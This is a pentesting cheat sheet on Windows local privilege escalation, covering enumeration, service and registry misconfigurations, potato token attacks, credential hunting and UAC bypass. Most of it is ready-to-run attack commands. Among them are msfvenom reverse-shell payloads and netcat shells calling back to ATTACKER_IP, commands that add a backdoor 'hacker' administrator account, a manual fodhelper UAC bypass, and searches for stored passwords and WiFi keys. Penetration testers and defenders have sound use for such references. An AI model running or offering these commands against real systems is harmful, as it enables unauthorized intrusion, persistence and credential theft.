Windows Privilege Escalation

Local privilege escalation on Windows involves exploiting misconfigurations, vulnerable services, and token manipulation to elevate from standard user to SYSTEM or Administrator.

Warning

Always ensure you have proper authorization before attempting privilege escalation. Document all techniques used and their outcomes.

Initial Enumeration

System Information

Check current user and privileges.

powershell 
whoami /all
whoami /priv
whoami /groups

System information.

powershell 
systeminfo
hostname
net user %username%
net localgroup administrators

Check installed patches (for kernel exploits).

powershell 
wmic qfe get Caption,Description,HotFixID,InstalledOn

Automated Enumeration Tools

WinPEAS

Comprehensive Windows privilege escalation scanner.

powershell 
# Download WinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany.exe -o winpeas.exe

# Run full scan
.\winPEASany.exe

# Run specific checks
.\winPEASany.exe servicesinfo
.\winPEASany.exe applicationsinfo

PowerUp

PowerShell privilege escalation script.

powershell 
# Import module
Import-Module .\PowerUp.ps1

# Run all checks
Invoke-AllChecks

# Specific checks
Get-UnquotedService
Get-ModifiableServiceFile
Get-ModifiableService

Seatbelt & SharpUp

GhostPack enumeration tools.

powershell 
# Seatbelt - comprehensive system survey
.\Seatbelt.exe -group=all

# SharpUp - quick privesc check
.\SharpUp.exe audit

PrivescCheck

PowerShell alternative to WinPEAS.

powershell 
Import-Module .\PrivescCheck.ps1
Invoke-PrivescCheck -Extended

Service Misconfigurations

Unquoted Service Paths

Find services with unquoted paths containing spaces.

powershell 
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"

PowerUp detection.

powershell 
Get-UnquotedService

Exploitation: If path is C:\Program Files\Vuln Service\service.exe, create executable at C:\Program.exe or C:\Program Files\Vuln.exe.

Writable Service Binaries

Check for services with writable executables.

powershell 
# Using accesschk (Sysinternals)
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv "Users" * /accepteula

# Check specific service
accesschk.exe -ucqv "VulnService" /accepteula

PowerUp - find modifiable service files.

powershell 
Get-ModifiableServiceFile

Exploitation: Replace service binary with malicious executable, restart service.

powershell 
# Create malicious service binary (msfvenom)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe > malicious.exe

# Replace and restart
copy malicious.exe "C:\Path\To\Service.exe"
sc stop VulnService
sc start VulnService

Modifiable Service Configuration

Check if service configuration can be modified.

powershell 
Get-ModifiableService

Exploitation: Change service binary path.

powershell 
sc config VulnService binpath= "C:\Windows\Temp\malicious.exe"
sc stop VulnService
sc start VulnService

DLL Hijacking

Find services loading DLLs from writable locations.

text 
# Use Process Monitor to find missing DLLs
# Filter: Result = NAME NOT FOUND, Path ends with .dll

# Common hijackable locations
C:\Windows\Temp
C:\Users\Public
Current working directory of service

Create malicious DLL.

bash 
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll > malicious.dll

Token Impersonation (Potato Attacks)

Information

Potato attacks exploit SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege to escalate to SYSTEM. These privileges are common on service accounts (IIS, SQL Server, etc.).

Check for required privileges.

powershell 
whoami /priv | findstr -i "SeImpersonate SeAssignPrimaryToken"

PrintSpoofer (Windows 10/Server 2019+)

powershell 
# Get SYSTEM shell
.\PrintSpoofer.exe -i -c cmd

# Execute specific command
.\PrintSpoofer.exe -c "net user hacker Password123! /add"
.\PrintSpoofer.exe -c "net localgroup administrators hacker /add"

GodPotato (Universal - Windows 8+)

powershell 
# Execute command as SYSTEM
.\GodPotato.exe -cmd "cmd /c whoami"
.\GodPotato.exe -cmd "cmd /c net user hacker Password123! /add"

# Reverse shell
.\GodPotato.exe -cmd "C:\Windows\Temp\nc.exe ATTACKER_IP 4444 -e cmd"

JuicyPotato (Windows 7/8/Server 2008/2012/2016)

powershell 
# Find valid CLSID for target OS
# https://github.com/ohpe/juicy-potato/tree/master/CLSID

# Execute with specific CLSID
.\JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {CLSID}

SweetPotato

powershell 
.\SweetPotato.exe -p cmd.exe -a "/c whoami"
.\SweetPotato.exe -p C:\Windows\Temp\nc.exe -a "ATTACKER_IP 4444 -e cmd"

RoguePotato

powershell 
# Requires attacker machine listening on port 135
# Attacker: socat tcp-listen:135,reuseaddr,fork tcp:TARGET:9999

.\RoguePotato.exe -r ATTACKER_IP -e "cmd.exe /c whoami" -l 9999

Registry Misconfigurations

AlwaysInstallElevated

Check if MSI files always install with elevated privileges.

powershell 
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Exploitation: Create malicious MSI.

bash 
# Generate malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f msi > malicious.msi

# Install as user (will run as SYSTEM)
msiexec /quiet /qn /i malicious.msi

AutoRun Registry Keys

Check autorun locations for writable entries.

powershell 
# Check Run keys
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

# Check for writable paths in autorun entries
accesschk.exe -wvu "C:\Path\From\Registry"

Scheduled Tasks

List scheduled tasks.

powershell 
schtasks /query /fo LIST /v
schtasks /query /fo LIST /v | findstr /i "task to run"

Check for writable task executables.

powershell 
# Find tasks running as SYSTEM
schtasks /query /fo LIST /v | findstr -i "SYSTEM"

# Check if binary is writable
accesschk.exe -wvu "C:\Path\To\Task\Binary.exe"

Credential Hunting

Search for passwords in files.

powershell 
# Search common files
findstr /si "password" *.txt *.ini *.config *.xml
findstr /si "pwd" *.txt *.ini *.config *.xml

# Search registry for passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

# Check stored credentials
cmdkey /list

Check for saved credentials.

powershell 
# Use saved credentials
runas /savecred /user:admin cmd.exe

# WiFi passwords
netsh wlan show profiles
netsh wlan show profile name="ProfileName" key=clear

UAC Bypass

Check UAC level.

powershell 
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin

UACME - UAC bypass tool collection.

powershell 
# List methods
Akagi64.exe

# Execute bypass (method 23 = fodhelper)
Akagi64.exe 23 C:\Windows\Temp\malicious.exe

Fodhelper bypass (manual).

powershell 
# Set registry key
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe /c start C:\Windows\Temp\malicious.exe" /f

# Trigger
fodhelper.exe

🛠️ Tools Reference

WinPEAS

Comprehensive Windows privesc scanner

GitHub →

PowerUp

PowerShell privesc detection

GitHub →

GodPotato

Universal potato attack

GitHub →

UACME

UAC bypass methods

GitHub →

Related Topics

Linux Privilege Escalation

Linux local privesc techniques

Persistence

Maintaining access

Credential Dumping

Extract credentials from memory

PowerShell Cheatsheet

PowerShell commands for pentesting